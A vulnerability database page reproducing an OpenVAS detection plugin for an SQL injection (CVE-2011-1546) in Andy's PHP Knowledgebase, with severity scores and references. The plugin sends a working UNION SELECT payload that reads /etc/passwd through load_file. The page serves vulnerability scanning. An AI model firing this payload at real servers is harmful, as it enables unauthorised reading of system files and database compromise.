Lucene search
Copyright (C) 2011 Greenbone AGOPENVAS:1361412562310103135HistoryMar 31, 2011 - 12:00 a.m.
Andy's PHP Knowledgebase 's' Parameter SQL Injection Vulnerability
2011-03-3100:00:00
Copyright (C) 2011 Greenbone AG
plugins.openvas.org
12
6.4 Medium
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.004 Low
EPSS
Percentile
74.3%
Andy
# SPDX-FileCopyrightText: 2011 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:aphpkb:aphpkb";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103135");
script_version("2023-07-28T05:05:23+0000");
script_tag(name:"last_modification", value:"2023-07-28 05:05:23 +0000 (Fri, 28 Jul 2023)");
script_tag(name:"creation_date", value:"2011-03-31 17:03:50 +0200 (Thu, 31 Mar 2011)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2011-1546");
script_name("Andy's PHP Knowledgebase 's' Parameter SQL Injection Vulnerability");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2011 Greenbone AG");
script_dependencies("secpod_aphpkb_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("aphpkb/installed");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/47097");
script_tag(name:"solution", value:"Updates are available. Please contact the vendor for more information.");
script_tag(name:"summary", value:"Andy's PHP Knowledgebase is prone to an SQL-injection vulnerability
because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.");
script_tag(name:"impact", value:"Exploiting this issue could allow an attacker to compromise the
application, access or modify data, or exploit latent vulnerabilities in the underlying database.");
script_tag(name:"affected", value:"Andy's PHP Knowledgebase 0.95.2 is vulnerable. Other versions may also
be affected.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
if(!port = get_app_port(cpe:CPE))
exit(0);
if(!dir = get_app_location(cpe:CPE, port:port))
exit(0);
if(dir == "/")
dir = "";
url = string(dir, "/a_viewusers.php?s=1+UNION+SELECT+load_file(0x2f6574632f706173737764),null,null,null,null,null,null+limit+0");
if(http_vuln_check(port:port, url:url, pattern:"root:.*:0:[01]:")) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
exit(99);
References
Related
seebug
seebug
Andy's PHP Knowledgebase 0.95.2 (viewusers.php) SQL Injection
2014-07-01 00:00:00
openvas
openvas
Andy's PHP Knowledgebase 's' Parameter SQL Injection Vulnerability
2011-03-31 00:00:00
packetstorm
packetstorm
Andy's PHP Knowledgebase 0.95.2 SQL Injection
2011-03-30 00:00:00
cve
cve
securityvulns
securityvulns
prion
prion
exploitpack
exploitpack
Andys PHP KnowledgeBase 0.95.2 - viewusers.php SQL Injection
2011-03-30 00:00:00
exploitdb
exploitdb
6.4 Medium
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.004 Low
EPSS
Percentile
74.3%
Related for OPENVAS:1361412562310103135